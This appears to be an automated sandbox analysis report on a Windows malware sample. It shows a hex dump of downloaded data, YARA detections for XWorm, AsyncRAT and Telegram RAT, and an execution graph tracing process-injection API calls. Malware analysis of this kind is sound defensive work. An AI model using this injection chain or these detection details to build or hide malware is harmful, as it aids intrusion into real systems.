                                                          Last-Modified: Tue, 07 Jan 2025 07:50:43 GMT
                                                          2025-01-09 07:26:19 UTC3780INData Raw: 06 62 dd 23 c0 7a e6 d9 e8 bf 77 22 0b 3b f0 c4 09 7d 98 82 dd 02 a7 f1 39 d7 bd 6c 63 18 59 91 54 88 9d 48 85 92 6c b1 00 b2 c3 9d 42 74 ee 0d 41 a7 15 28 84 75 65 ec 41 92 bf 74 31 20 d0 c7 64 7e ca 25 15 d4 f5 7c 61 3e 55 3b 64 eb f4 f3 d9 b1 e7 64 de d0 ef 7a 1d ce 9f 3e d0 6f 8f 85 d7 3d e9 cc 72 19 e1 36 8c 50 bf d0 45 07 62 67 83 3b ef d3 78 97 ee 65 25 17 21 8e 3f a5 ba 1c 32 f2 1d ce 74 5b 74 8d c7 84 87 5d 16 ff e8 7c cc 54 bb 6a 4f 04 32 0d 0f 6c d6 6f 9f ac ee ac 5e c5 2b 08 b5 ba a8 09 cc 63 2f 02 67 c5 29 df 0e 0d 42 d5 90 30 07 f1 c7 41 dc b4 74 74 20 c4 39 7b ec 98 14 67 c9 b2 b1 54 db 6a 3d 4a 3b bc dd a8 6b 40 e9 af b7 30 86 a9 4a 10 c6 e9 69 5d 66 63 3e 30 33 ac 12 6a 84 f5 59 b9 80 cb 92 ff fc b6 7a 3d f3 e0 ba 93 67 e9 7b 5e e5 25 30
                                                          Data Ascii: b#zw";}9lcYTHlBtA(ueAt1 d~%|a>U;ddz>o=r6PEbg;xe%!?2t[t]|TjO2lo^+c/g)B0Att 9{gTj=J;k@0Ji]fc>03jYz=g{^%0
                                                          2025-01-09 07:26:19 UTC4096INData Raw: 8e b6 c7 18 07 f2 b2 83 1e 24 df 21 4d 1b ff ef b3 7e 3d af 86 99 ff b5 a8 12 cd d4 f7 7e e0 41 85 f2 8b 03 3d 05 6c cf 5a 92 ad 0e 82 06 8c 22 ae b6 af 6f 56 de 52 56 28 84 cb 18 e0 69 7a d3 fc c0 7b ef 61 4e 74 bd 0d 2a 40 03 94 d7 ec ae 15 a5 10 3b d8 a6 05 fc d6 03 e8 2e 94 fc 4d ad 30 cc c5 b6 7c db 36 6d ff 10 64 c8 e6 68 7d cb 64 2f ea ac a2 30 21 f6 dc 5f ae 76 bb d3 d7 19 b4 a3 a5 16 87 68 60 58 d1 e4 e7 62 ba 18 e6 b9 8b f5 e9 c2 3a e9 35 6c 28 3c aa 5d 0e 34 cf d8 0f 32 47 fd 6a 21 93 ea 44 e4 ae 73 ff 4c 8c 25 06 9b 60 25 d0 e1 f3 b0 f8 36 e3 b7 eb e7 be f9 e6 b8 bd 73 71 74 2c 8c e6 a3 2b eb ae e1 7c 11 96 e6 38 e1 2f d0 49 13 45 4b 31 78 10 85 ce 9f fe 67 3a 8b 05 af c2 02 a4 09 fb 00 28 23 16 cb 74 39 16 b9 2d c8 0f 5c f7 f9 cc cb c3 e5 73
                                                          Data Ascii: $!M~=~A=lZ"oVRV(iz{aNt*@;.M0|6mdh}d/0!_vh`Xb:5l(<]42Gj!DsL%`%6sqt,+|8/IEK1xg:(#t9-\s
                                                          2025-01-09 07:26:19 UTC4096INData Raw: 89 ab c9 7f 0d b2 16 51 c9 64 08 77 30 a7 cc 0b 16 6a d8 1c d6 dc 55 38 e0 89 9d 35 cf 24 b5 5f dd b3 aa 59 a0 6d 90 5d 1e 6d 51 7c 30 56 ab ec c1 ff 4d 9b 29 62 bf 94 81 d5 c0 ad a4 96 94 1f 20 53 e7 fe b7 93 50 18 df f0 be 99 21 38 ee 73 e9 27 cd 08 9a 11 59 c8 95 99 51 10 5a 5c de 45 58 27 6d f0 57 32 42 35 a3 a6 6c 80 89 24 68 30 19 12 81 30 26 75 bd 02 c6 dc a4 0c 81 4b 05 55 06 02 8c 5d bf 54 ce ac 08 ba 0e 61 84 4c 9d 0d a0 5d fd bb 2e 34 1f 26 c2 e3 7e 3d 52 12 31 07 d9 1c 81 d2 87 63 35 f1 d1 3e 1d 49 4a ec 66 c0 6a ef 62 58 09 ea a5 b1 d7 c2 15 8e f9 53 51 83 d8 c5 e8 e2 ce 5d 58 99 a4 d6 de 46 fe ff 45 15 d0 eb 0b ac 10 32 78 ce d6 26 06 38 75 b1 52 1e 67 e7 1d 46 6b 97 44 4c 5e df 8e a9 62 65 f7 06 29 e8 69 14 87 5a da 21 b3 2f 0a 75 4c 69 b8
                                                          Data Ascii: Qdw0jU85$_Ym]mQ|0VM)b SP!8s'YQZ\EX'mW2B5l$h00&uKU]TaL].4&~=R1c5>IJfjbXSQ]XFE2x&8uRgFkDL^be)iZ!/uLi
                                                          2025-01-09 07:26:19 UTC4096INData Raw: 87 68 89 99 b6 99 28 7f 45 31 88 2a 8f c2 a7 88 59 a8 34 41 fa 6a d1 47 32 95 bd bc b6 35 73 e9 48 04 af a3 d2 17 87 1b 5c 3d 38 2b 3a d5 54 a9 a4 44 72 fd dd a4 35 28 a0 58 a8 f7 f2 4d 2a 6f 39 7c e7 76 94 c8 66 bf 89 a6 a5 4b c7 61 ac af a1 eb 9d 36 d6 5e 52 6f 16 b9 0b 50 37 32 81 90 56 f2 bc 70 d7 7e 97 fc 44 3f 00 d9 49 2b 4c 59 9a 8c 55 b6 b1 6a 35 8c 4f 67 13 6e 16 90 ab e5 c5 f4 8b 4f d4 e7 6a 81 ef cc f7 03 d7 99 0c 91 54 76 98 81 2f cd 1c aa 42 ed 80 c5 bd 3e ae d7 f5 33 36 d7 b7 b7 eb f0 96 c6 e1 d5 66 4a 83 8f 6c 60 61 78 47 37 df 60 b0 79 84 fb 68 34 5e 23 34 1e b6 8b 2d f8 c4 7c 9b f8 1a 70 8f 03 bd 67 04 13 ad 71 b8 7f 51 9a e7 d7 fe f9 08 de ed d0 e7 4a d7 6e fd 53 46 d3 20 6c b0 8b 52 a3 44 c7 5f e4 7e 3b d9 79 e8 80 56 1d 3d 2e a5 0b a6
                                                          Data Ascii: h(E1*Y4AjG25sH\=8+:TDr5(XM*o9|vfKa6^RoP72Vp~D?I+LYUj5OgnOjTv/B>36fJl`axG7`yh4^#4-|pgqQJnSF lRD_~;yV=.
                                                          2025-01-09 07:26:19 UTC4096INData Raw: b3 b0 6e b8 0f a8 88 14 f6 62 17 fb b4 a1 3f d1 37 12 04 10 ba 50 d8 cc 1b 9a 30 e9 d3 14 02 d7 32 15 af 36 5b ea 04 28 43 3a c3 2b 9b 20 af 02 8c 3f 8c b9 11 45 7a 7a 03 f8 63 6a 6d 10 37 c3 76 50 f4 4e 98 38 ef 46 40 d5 11 e3 9d f7 53 38 0e 07 e7 0a 4f 50 a6 6c c7 a9 c6 17 31 71 43 0c 00 63 7b ab 7e eb 23 a1 ae 1a b0 23 9f a3 37 89 97 fc db fc 13 c0 23 7a 1f 7a 37 f9 f0 6a 08 a5 34 d3 3a 05 0f 75 5b bb 41 ea 03 de ab 6c e0 13 c4 8f ac f4 f5 42 a4 d0 7d 8f 3e 26 63 a6 72 81 b2 a1 13 43 cf 98 3a 46 f2 1d 85 e7 1d 60 26 68 e6 80 fd 61 ca 2e 36 9a ff 10 be 03 3e 77 bd 15 30 fe c6 f5 82 3c 56 64 30 1a b9 ca ba ae 8c 22 9c e9 c7 0f a1 95 5d cd 11 fe 97 3b 32 79 98 a4 d6 3f c3 4c ac ba f5 71 86 99 97 a8 f8 67 9e c0 6d 45 ce ae 51 e8 25 5f ff c5 02 14 66 a3 be
                                                          Data Ascii: nb?7P026[(C:+ ?Ezzcjm7vPN8F@S8OPl1qCc{~##7#zz7j4:u[AlB}>&crC:F`&ha.6>w0<Vd0"];2y?LqgmEQ%_f
                                                          2025-01-09 07:26:19 UTC4096INData Raw: 10 2a 53 55 af a4 fc 38 b0 65 e4 cc eb a9 44 d9 c7 f0 c2 2f 52 8a c1 81 1c 5d 60 24 c0 c6 53 4f 3d d7 f9 89 a5 3b 4a 58 09 53 b3 1a 15 a1 9a 5f 98 eb e5 14 37 9a 1e f3 fa b0 50 ce 17 74 b2 76 34 41 d4 eb 89 4e 04 6a bc d4 09 00 c5 e4 f5 d9 a6 35 08 91 d6 f0 63 fd 93 61 9f 50 e3 41 49 07 ee ce 27 f4 f6 47 88 e2 13 e5 1b 03 e1 8e b5 88 e1 59 36 1a 60 4d 9c e8 8d 34 4a 74 a8 4a d3 1c a9 da 01 cb bf 93 0c 88 7a d9 d6 8b 02 5d 43 5a 0e 3d ae 7f 9d e7 fd 75 cd 73 e2 16 ae 7b 26 13 df d2 28 e1 e1 55 95 50 5a 06 38 72 c3 53 7b 10 87 d4 1c 83 38 20 2f f4 9c 99 76 66 2c 97 4a b0 08 74 e8 92 74 72 ca 73 29 b5 da f8 9c 6f 2c c8 93 de 6b 3b 1f 35 1c eb a5 c8 7a 67 8f df c4 58 a8 4f ca cb 91 27 44 2b 6e 0f af ca 0b a8 d6 84 cb cc f5 9d 88 b4 a7 6f 18 8e e5 65 2a e2 4e
                                                          Data Ascii: *SU8eD/R]`$SO=;JXS_7Ptv4ANj5caPAI'GY6`M4JtJz]CZ=us{&(UPZ8rS{8 /vf,Jttrs)o,k;5zgXO'D+noe*N
                                                          2025-01-09 07:26:19 UTC4096INData Raw: fd 08 67 40 08 dd bc 86 16 73 e2 4d 92 6d d3 b9 25 25 3b 26 62 76 bc 9c 15 cb 26 50 8f 38 17 0d c7 39 f1 7a ca 39 ba 10 f2 c6 8d 00 3d 22 4a 50 ff 05 5a 7c 47 b7 ad fc 67 4a d0 97 04 d0 ef 2b e0 fd c8 71 10 e2 84 e2 92 9b c6 a8 55 86 71 0d c1 15 aa 55 ac 8e d5 47 4b 31 88 63 d8 2a 7f 82 42 54 53 1c 83 63 cc 05 f2 dd 28 5a d1 cf f0 5a a9 3e 25 2e 06 f6 b2 f5 2d 0d c6 d2 57 fc c0 47 d1 81 76 7b 15 76 00 38 ed 7f a7 aa 02 20 3f 1b 17 99 06 ce 8b 52 12 20 82 2d bf 9e e1 ac 2e c3 60 72 4c 38 fa 10 e2 ac f1 db 13 73 87 a4 07 79 2a 74 3d 0c 2c 81 60 3e 0f d8 a4 91 d5 75 7b a9 6a 96 a3 c5 08 e0 93 e1 c6 06 e0 a7 4f c3 e8 7e aa 50 53 5f fa 8f 8a 27 5c 88 4d ae 7e a0 58 f4 71 e5 fa b0 00 21 47 b9 63 80 fd a1 c1 c8 17 cb cf 2a 81 7e c4 e9 64 0c da 6f 5b fc fd 85 e8
                                                          Data Ascii: g@sMm%%;&bv&P89z9="JPZ|GgJ+qUqUGK1c*BTSc(ZZ>%.-WGv{v8 ?R -.`rL8sy*t=,`>u{jO~PS_'\M~Xq!Gc*~do[
                                                          2025-01-09 07:26:19 UTC4096INData Raw: 02 39 e7 4b df 7e ad f9 c0 02 e6 f8 7b c4 30 64 12 fb f0 0c 1e 3c 44 02 d5 c6 d0 1a 78 7b 0b 86 61 0c d9 9f 2a 79 3d 79 4c 0e 61 4b 20 48 f2 6b 4d f1 a9 a6 34 3d a7 50 1d 8d 24 36 97 bc be 3a 71 9e 03 31 ac e0 8b 3b f3 fd 10 45 61 f0 50 dc 5a c6 7f 33 b0 87 52 25 ed 31 08 0b 50 b0 0c 90 12 29 ed 1e 3e 71 9f b2 43 ea f0 12 82 de 4b f8 5a ae 17 75 91 81 67 c4 1b 88 57 13 6e 9b 1a a1 47 35 51 39 b7 54 5f af cc 51 bd 48 8e 52 9a 13 b5 de 5c 81 dd 58 5a 8f 45 4a b0 bf 5d fd ee 20 4c 21 ec 80 55 23 a9 07 b4 ef f0 5f 16 ae cb c0 54 e0 d1 d1 b0 b6 d8 8d 68 e9 df 8f 03 5e f7 11 7a e4 5e b5 6c a4 a1 0a 03 d2 f4 43 f8 c1 f8 72 3c 28 0f 4f cd 5b ca 28 8a 15 89 57 d4 4d 06 3e 43 d0 5e 6c bf 3c 2d f5 88 58 5d 64 12 49 51 a3 87 23 10 20 31 f6 2e b6 26 85 d1 d8 1e 55 b0
                                                          Data Ascii: 9K~{0d<Dx{a*y=yLaK HkM4=P$6:q1;EaPZ3R%1P)>qCKZugWnG5Q9T_QHR\XZEJ] L!U#_Th^z^lCr<(O[(WM>C^l<-X]dIQ# 1.&U
                                                          2025-01-09 07:26:19 UTC676INData Raw: d8 7f 19 83 a7 32 63 2f 8e b4 df 5b 2c 89 a9 1f 1d e7 41 87 03 05 ac 6b 5c 29 cf 11 a6 67 c8 e6 32 07 aa 54 2c 08 01 47 1f 4b 2d c9 53 a6 64 3e 1a 48 02 b9 78 5b 6d 4d 5f 55 f9 37 28 05 59 fd f6 40 0d 2d dc 02 6c 52 6d 3c aa 32 4e 7f 61 e2 89 94 07 d0 d5 ce e4 7b 3b 50 b7 c1 c8 6d a8 fb 7e 23 a4 e6 c3 54 28 c6 8c f9 b5 3d 2e 44 cd c3 ad 78 72 16 ae 01 5a 98 50 bd de 85 3c 2b f7 d6 c3 1c 93 4a 72 ba 3e 69 7e 13 0e be 65 b1 20 1c a0 99 b2 9a c3 96 e2 0b 6a 6a 5e 2c 75 3e 8a a4 1e 0b 3c 7c 40 40 a4 4f 80 dd 89 73 36 d4 4c b8 62 8a 79 46 f8 5c 07 3e c0 e3 c5 40 d3 02 fc 8f 0f cd ee 12 e1 6c 5e d1 85 9d ff 4e a9 89 e4 13 5b 24 dc 28 63 95 99 6e 61 56 3d 34 13 2a 4c 9a c7 ce 17 5a 38 82 ac 35 4f 8f 35 47 12 0e e8 75 ad fa fb ba c2 0b 98 a5 87 2a f8 3a 84 9d 45
                                                          Data Ascii: 2c/[,Ak\)g2T,GK-Sd>Hx[mM_U7(Y@-lRm<2Na{;Pm~#T(=.DxrZP<+Jr>i~e jj^,u><|@@Os6LbyF\>@l^N[$(cnaV=4*LZ85O5Gu*:E
                                                          2025-01-09 07:26:19 UTC4096INData Raw: c3 a4 6a 67 f8 ff 66 6e b4 93 97 85 fe ae fe 8d 17 e7 9b 62 53 0d 98 b8 bb 63 b0 0c 67 de fe 0c 45 bc 3e e5 dc 53 ab cc 04 6e 9a 45 b3 4d 34 40 03 c3 1b 4d 5c 84 47 c5 fb e5 7f 36 de 06 1a 0e 95 6c 10 f2 b3 e8 8b 39 9f 31 95 7b fe af ab 80 ca 54 56 06 38 81 a9 71 0c f4 5d be ef df ef 1e db 72 ff a7 86 72 7e 27 1f 1e f4 a2 f3 27 e1 fa b2 8e 23 3d ed 99 c9 af 92 cc 95 02 3d 08 e0 a7 b9 1e 2a fd f8 1a 54 1f f7 a4 92 84 40 62 31 cd af 88 cf 3d 29 7d 9f a4 78 7e b1 34 ba 6a b6 47 1a 09 1a 28 e9 4b d1 2a 0b a2 e4 2d fd 63 0c 87 7f 58 8e c0 62 b3 73 11 ed e6 10 13 4e 1e d3 51 e2 76 19 42 53 d1 e0 fb a2 06 71 32 d7 d8 2e bf 6a 8c 3a 97 18 16 52 a3 de 87 34 80 80 d3 75 49 21 c7 5f b6 af d9 8b 40 10 60 9b 7b 3f bc d1 c1 2f 40 3e cd 1f c6 30 04 ee ee 94 d7 10 f3 ec
                                                          Data Ascii: jgfnbScgE>SnEM4@M\G6l91{TV8q]rr~''#==*T@b1=)}x~4jG(K*-cXbsNQvBSq2.j:R4uI!_@`{?/@>0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:02:26:14
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\Desktop\Ref#103052.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Ref#103052.exe"
                                                          Imagebase:0x2d0000
                                                          File size:73'848 bytes
                                                          MD5 hash:BAC93B85BD7054A23583F29D19FE4206
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2280032784.00000000061A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2274026597.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:02:26:22
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\Desktop\Ref#103052.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Ref#103052.exe"
                                                          Imagebase:0x8f0000
                                                          File size:73'848 bytes
                                                          MD5 hash:BAC93B85BD7054A23583F29D19FE4206
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:11
                                                          Start time:02:26:25
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 928
                                                          Imagebase:0xe90000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:11.2%
                                                            Dynamic/Decrypted Code Coverage:98%
                                                            Signature Coverage:4.5%
                                                            Total number of Nodes:200
                                                            Total number of Limit Nodes:11
                                                            execution_graph 67801 b137e0 67802 b137fd 67801->67802 67803 b1380d 67802->67803 67806 63311f0 67802->67806 67809 6338ce2 67802->67809 67808 633d3f8 VirtualProtect 67806->67808 67807 63301cf 67808->67807 67811 633d3f8 VirtualProtect 67809->67811 67810 6338d00 67811->67810 67743 629888b 67744 6298891 67743->67744 67748 611f3a0 67744->67748 67753 611f3b0 67744->67753 67745 62988d5 67749 611f3c5 67748->67749 67758 611f981 67749->67758 67763 611f89c 67749->67763 67750 611f3db 67750->67745 67754 611f3c5 67753->67754 67756 611f981 2 API calls 67754->67756 67757 611f89c 2 API calls 67754->67757 67755 611f3db 67755->67745 67756->67755 67757->67755 67760 611f987 67758->67760 67759 611fb93 67759->67750 67760->67759 67768 63139c0 67760->67768 67772 63139b8 67760->67772 67764 611f8ac 67763->67764 67765 611fb93 67764->67765 67766 63139c0 VirtualProtect 67764->67766 67767 63139b8 VirtualProtect 67764->67767 67765->67750 67766->67764 67767->67764 67769 6313a08 VirtualProtect 67768->67769 67771 6313a43 67769->67771 67771->67760 67773 63139c0 VirtualProtect 67772->67773 67775 6313a43 67773->67775 67775->67760 67797 6427900 67798 642794e NtProtectVirtualMemory 67797->67798 67800 6427998 67798->67800 67706 633e830 67707 633e870 VirtualAlloc 67706->67707 67709 633e8aa 67707->67709 67710 629832f 67711 6298339 67710->67711 67715 6317ac0 67711->67715 67720 6317ab3 67711->67720 67712 6298289 67716 6317ad5 67715->67716 67717 6317aeb 67716->67717 67725 631a2ed 67716->67725 67730 631a435 67716->67730 67717->67712 67721 6317ac0 67720->67721 67722 6317aeb 67721->67722 67723 631a435 2 API calls 67721->67723 67724 631a2ed 2 API calls 67721->67724 67722->67712 67723->67722 67724->67722 67726 631a2ec 67725->67726 67726->67725 67727 631a43f 67726->67727 67735 631d154 67726->67735 67739 631d160 67726->67739 67731 631a43f 67730->67731 67732 631a2ec 67730->67732 67732->67730 67733 631d160 CopyFileA 67732->67733 67734 631d154 CopyFileA 67732->67734 67733->67732 67734->67732 67736 631d160 CopyFileA 67735->67736 67738 631d2b7 67736->67738 67740 631d1b5 CopyFileA 67739->67740 67742 631d2b7 67740->67742 67812 64200b4 67814 64200a5 67812->67814 67813 642017b 67814->67812 67814->67813 67817 6420790 67814->67817 67832 64207a0 67814->67832 67818 64207a0 67817->67818 67819 64207d7 67818->67819 67847 6420fac 67818->67847 67853 6421da8 67818->67853 67858 6421f48 67818->67858 67863 64213e3 67818->67863 67868 6421006 67818->67868 67873 6421b3c 67818->67873 67878 642115d 67818->67878 67883 64210d1 67818->67883 67889 6420ede 67818->67889 67894 6421892 67818->67894 67900 6421950 67818->67900 67906 642182e 67818->67906 67819->67814 67833 64207b5 67832->67833 67834 64207d7 67833->67834 67835 64213e3 2 API calls 67833->67835 67836 6421006 2 API calls 67833->67836 67837 6421da8 2 API calls 67833->67837 67838 6421f48 2 API calls 67833->67838 67839 642182e 2 API calls 67833->67839 67840 6420fac 2 API calls 67833->67840 67841 6421892 2 API calls 67833->67841 67842 6421950 2 API calls 67833->67842 67843 64210d1 2 API calls 67833->67843 67844 6420ede 2 API calls 67833->67844 67845 6421b3c 2 API calls 67833->67845 67846 642115d 2 API calls 67833->67846 67834->67814 67835->67834 67836->67834 67837->67834 67838->67834 67839->67834 67840->67834 67841->67834 67842->67834 67843->67834 67844->67834 67845->67834 67846->67834 67848 6421f6e 67847->67848 67850 6420d42 67847->67850 67911 642b1e0 67848->67911 67915 642b1e8 67848->67915 67849 6421faa 67849->67819 67854 6421dae 67853->67854 67919 642abc8 67854->67919 67923 642abc0 67854->67923 67855 6421e63 67855->67819 67859 6421f52 67858->67859 67861 642b1e0 NtResumeThread 67859->67861 67862 642b1e8 NtResumeThread 67859->67862 67860 6421faa 67860->67819 67861->67860 67862->67860 67864 64213fb 67863->67864 67927 64224d8 67864->67927 67932 64224c8 67864->67932 67865 6421413 67869 6421015 67868->67869 67871 642abc0 WriteProcessMemory 67869->67871 67872 642abc8 WriteProcessMemory 67869->67872 67870 6420d42 67870->67819 67871->67870 67872->67870 67874 6421b44 67873->67874 67956 642a3a8 67874->67956 67960 642a3a0 67874->67960 67875 6421b7b 67875->67819 67879 6421167 67878->67879 67964 642a950 67879->67964 67968 642a958 67879->67968 67880 6421200 67880->67819 67884 6421b3f 67883->67884 67885 6420d42 67883->67885 67887 642a3a0 Wow64SetThreadContext 67884->67887 67888 642a3a8 Wow64SetThreadContext 67884->67888 67886 6421b7b 67886->67819 67887->67886 67888->67886 67890 6420eed 67889->67890 67892 642abc0 WriteProcessMemory 67890->67892 67893 642abc8 WriteProcessMemory 67890->67893 67891 6420f89 67891->67819 67892->67891 67893->67891 67895 6420d42 67894->67895 67896 6421183 67894->67896 67898 642a950 VirtualAllocEx 67896->67898 67899 642a958 VirtualAllocEx 67896->67899 67897 6421200 67897->67819 67898->67897 67899->67897 67901 6420d42 67900->67901 67902 6421183 67900->67902 67904 642a950 VirtualAllocEx 67902->67904 67905 642a958 VirtualAllocEx 67902->67905 67903 6421200 67903->67819 67904->67903 67905->67903 67907 642183d 67906->67907 67909 642a3a0 Wow64SetThreadContext 67907->67909 67910 642a3a8 Wow64SetThreadContext 67907->67910 67908 6421869 67909->67908 67910->67908 67912 642b1e8 NtResumeThread 67911->67912 67914 642b265 67912->67914 67914->67849 67916 642b230 NtResumeThread 67915->67916 67918 642b265 67916->67918 67918->67849 67920 642ac10 WriteProcessMemory 67919->67920 67922 642ac67 67920->67922 67922->67855 67924 642abc8 WriteProcessMemory 67923->67924 67926 642ac67 67924->67926 67926->67855 67928 64224ef 67927->67928 67929 6422511 67928->67929 67938 6422b39 67928->67938 67943 6422bb8 67928->67943 67929->67865 67933 6422546 67932->67933 67934 64224d2 67932->67934 67935 6422511 67934->67935 67936 6422bb8 2 API calls 67934->67936 67937 6422b39 2 API calls 67934->67937 67935->67865 67936->67935 67937->67935 67939 6422b3f 67938->67939 67948 6428700 67939->67948 67952 64286f4 67939->67952 67944 6422be0 67943->67944 67946 6428700 CreateProcessA 67944->67946 67947 64286f4 CreateProcessA 67944->67947 67945 6422f3c 67946->67945 67947->67945 67949 6428764 CreateProcessA 67948->67949 67951 64288ec 67949->67951 67953 6428700 CreateProcessA 67952->67953 67955 64288ec 67953->67955 67957 642a3ed Wow64SetThreadContext 67956->67957 67959 642a435 67957->67959 67959->67875 67961 642a3a8 Wow64SetThreadContext 67960->67961 67963 642a435 67961->67963 67963->67875 67965 642a958 VirtualAllocEx 67964->67965 67967 642a9d5 67965->67967 67967->67880 67969 642a998 VirtualAllocEx 67968->67969 67971 642a9d5 67969->67971 67971->67880 67776 8bd030 67777 8bd048 67776->67777 67778 8bd0a3 67777->67778 67780 633de50 67777->67780 67781 633de78 67780->67781 67784 633e2e0 67781->67784 67782 633de9f 67785 633e30d 67784->67785 67788 633e4a3 67785->67788 67789 633d3f8 67785->67789 67788->67782 67791 633d41f 67789->67791 67793 633d848 67791->67793 67794 633d890 VirtualProtect 67793->67794 67796 633d4dc 67794->67796 67796->67782

                                                            Executed Functions

                                                            Function 0629DB30 Relevance: 16.2, Strings: 12, Instructions: 1153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                            • API String ID: 0-2072453518
                                                            • Opcode ID: ad723e7c0bce433717b9dd2656ceb064af02d47fbdd16e15325cfd5dd071084c
                                                            • Instruction ID: da9c920936613312a73867d195a00fb329fb266f49a750d52a3d2741d170a45c
                                                            • Opcode Fuzzy Hash: ad723e7c0bce433717b9dd2656ceb064af02d47fbdd16e15325cfd5dd071084c
                                                            • Instruction Fuzzy Hash: 44B22834A102198FDB54DFA4D894BADB7B2FF88300F158599E905AB3A4DB70EC85CF60
                                                            Function 062910DB Relevance: 9.4, Strings: 6, Instructions: 1920COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 329 62910db-629142e 364 6291430 329->364 365 6291435-629145f 329->365 364->365 550 6291465 call 6294978 365->550 551 6291465 call 6294988 365->551 367 629146b-62917de 388 62917e0 367->388 389 62917e5-62919e6 367->389 388->389 402 62919e8 389->402 403 62919ed-6291bd5 389->403 402->403 416 6291bdc-6291e0b 403->416 417 6291bd7 403->417 430 6291e0d 416->430 431 6291e12-6292e3f 416->431 417->416 430->431 542 62900d8-62900de 431->542 543 6292e45-6292e4d 431->543 544 62900e0-6292f14 542->544 545 62900e7-6290739 542->545 543->542 544->542 549 6292f1a-6292f22 544->549 545->542 549->542 550->367 551->367
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B T$O81$P$TJq$$q$$q
                                                            • API String ID: 0-2820933354
                                                            • Opcode ID: ff53e4c27d9d8e8e24faddc724690d98c0eefd179d79aee732515a3cae7deca3
                                                            • Instruction ID: d90dfaf3751e3da3fa05e4e13cb70da5a5b26e8eec41941fd59f105ff5b2ef86
                                                            • Opcode Fuzzy Hash: ff53e4c27d9d8e8e24faddc724690d98c0eefd179d79aee732515a3cae7deca3
                                                            • Instruction Fuzzy Hash: 6813F27A601104EFDB4A9F84CD48E95BFB2FB4D314B0680D4E2099B236C732D9A6EF55
                                                            Function 0629DE67 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280341788.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6290000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,q$4$$q$$q$$q$$q
                                                            • API String ID: 0-3956183810
                                                            • Opcode ID: 8305309e1923b1e06778290646c47c50ba413d303c810f31cb01b6206dee4dfa
                                                            • Instruction ID: 610e15909eb3d77c8eef32a34e0fd11ea39057a3fbd5b65f4af5049ecd53519e
                                                            • Opcode Fuzzy Hash: 8305309e1923b1e06778290646c47c50ba413d303c810f31cb01b6206dee4dfa
